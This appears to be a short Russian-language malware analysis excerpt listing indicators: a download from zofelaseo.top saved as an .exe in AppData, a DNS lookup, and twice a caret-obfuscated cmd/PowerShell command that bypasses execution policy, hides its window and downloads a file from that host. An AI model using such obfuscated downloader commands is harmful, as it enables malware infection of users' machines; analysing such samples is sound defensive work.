Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOW^E^rS^h^e^Ll^.^Ex^E ^-^eXE^C^UTI^oNPO^lI^Cy B^Y^Pa^S^S ^-N^oproFILE^ -^WiN^DO^wsTYL^E ^hi^D^DE^n^ (^n^e^W-oB^JEcT s^Y^StEm.neT^.^wEb^Cl^iE^nT)^.^D^owN^lOaD^fIlE^(^'http://zof...
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /c "pOW^E^rS^h^e^Ll^.^Ex^E ^-^eXE^C^UTI^oNPO^lI^Cy B^Y^Pa^S^S ^-N^oproFILE^ -^WiN^DO^wsTYL^E ^hi^D^DE^n^ (^n^e^W-oB^JEcT s^Y^StEm.neT^.^wEb^Cl^iE^nT)^.^D^owN^lOaD^fIlE^(^'http://zof...' (со скрытым окном)